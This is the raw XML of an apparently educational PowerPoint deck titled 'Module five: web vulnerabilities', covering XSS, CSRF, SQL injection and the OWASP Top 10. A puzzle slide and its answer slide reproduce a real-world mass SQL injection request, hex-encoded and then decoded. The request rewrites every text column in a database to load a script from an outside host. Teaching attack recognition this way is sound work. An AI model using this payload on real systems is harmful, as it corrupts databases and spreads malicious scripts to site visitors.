              <a:t>"GET /programs/biosafety/bioSafety_handBook/Chapter%206-Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727207768!6!5726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="18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93322D3A-A07D-62A8-242B-CD9CF0BA47B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388099" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F432B1-03A9-D894-4E5B-0A9FFE31E1F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>"GET</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>/programs/biosafety/bioSafety_handBook/Chapter%206-Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0xDECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"&gt;&lt;/title&gt;&lt;script src="http://sdo.1000mg.cn/csrss/w.js"&gt;&lt;/script&gt;&lt;!--'' wh??re '+@C+' not like ''%"&gt;&lt;/title&gt;&lt;script src="http://sdo.1000mg.cn/csrss/w.js"&gt;&lt;/script&gt;&lt;!--''')FETCH NEXT FROM  Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>http://www.dolcevie.com/js/converter.html</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0">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="632E62"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="19141A"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="762EB1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="762EB1"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="755DD9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="665EB8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="45A5ED"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="5982DB"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="E7CDE7"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="D09BCF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 3">
      <a:majorFont>
        <a:latin typeface="Bahnschrift"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="HelvLight"/>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7920</TotalTime>
  <Words>4379</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>520</Paragraphs>
  <Slides>65</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Bahnschrift</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>HelvLight</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>Module five: web vulnerabilities</vt:lpstr>
      <vt:lpstr>Panning for gold</vt:lpstr>
      <vt:lpstr>Input forms</vt:lpstr>
      <vt:lpstr>Form validation</vt:lpstr>
      <vt:lpstr>User input attacks</vt:lpstr>
      <vt:lpstr>Guessing files/directories</vt:lpstr>
      <vt:lpstr>Other attacks</vt:lpstr>
      <vt:lpstr>Puzzle – What is this?</vt:lpstr>
      <vt:lpstr>Answer</vt:lpstr>
      <vt:lpstr>OWASP’s Top 10 List</vt:lpstr>
      <vt:lpstr>Themes</vt:lpstr>
      <vt:lpstr>This Presentation's  Re-ordered  Top 10 List</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>Websites XSS’d</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>The Impact of XSS</vt:lpstr>
      <vt:lpstr>Preventing XSS</vt:lpstr>
      <vt:lpstr>Preventing XSS - Continued</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Example</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>Post vs Get</vt:lpstr>
      <vt:lpstr>Misconfigured, Default Settings, Unpatched Systems – Info Leakage</vt:lpstr>
      <vt:lpstr>Forced Directory Browsing</vt:lpstr>
      <vt:lpstr>Robots.txt</vt:lpstr>
      <vt:lpstr>"admin account info" filetype:log</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>Use Proper Authorization</vt:lpstr>
      <vt:lpstr>Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>UCLA Security Incident</vt:lpstr>
      <vt:lpstr>Impact of SQL Injection - Dangerous</vt:lpstr>
      <vt:lpstr>SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>More Dangerous SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>Preventing SQL injection </vt:lpstr>
      <vt:lpstr>Preventing SQL injection - Continued</vt:lpstr>
      <vt:lpstr>Injection Impacts  More Than SQL</vt:lpstr>
      <vt:lpstr>Malicious File Execution</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>Insecure Communication</vt:lpstr>
      <vt:lpstr>Authentication Checks</vt:lpstr>
      <vt:lpstr>Session Attacks</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>Web Services</vt:lpstr>
      <vt:lpstr>REST</vt:lpstr>
      <vt:lpstr>SOAP</vt:lpstr>
      <vt:lpstr>SOAP - Continued</vt:lpstr>
      <vt:lpstr>SOAP Security Recommendations</vt:lpstr>
      <vt:lpstr>SOAP Security Recommendations - Continued</vt:lpstr>
      <vt:lpstr>SOAP Standards: WS-* (Web Services-*)</vt:lpstr>
      <vt:lpstr>AJAX Request Lifecycle</vt:lpstr>
      <vt:lpstr>Potential Issues With AJAX</vt:lpstr>
      <vt:lpstr>Tips</vt:lpstr>
      <vt:lpstr>JavaScript Hijacking</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>How does it work?</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>“Reverse” JavaScript Hijacking and Mashups</vt:lpstr>
      <vt:lpstr>Browser Page Cache</vt:lpstr>
      <vt:lpstr>Browser History</vt:lpstr>
      <vt:lpstr>Browser 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One: The Role of Technology</dc:title>
  <dc:creator>Chad Johnson</dc:creator>
  <cp:lastModifiedBy>Johnson, Chad</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-22T15:36:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-27T22:44:04Z</dcterms:modified>
</cp:coreProperties>
</file>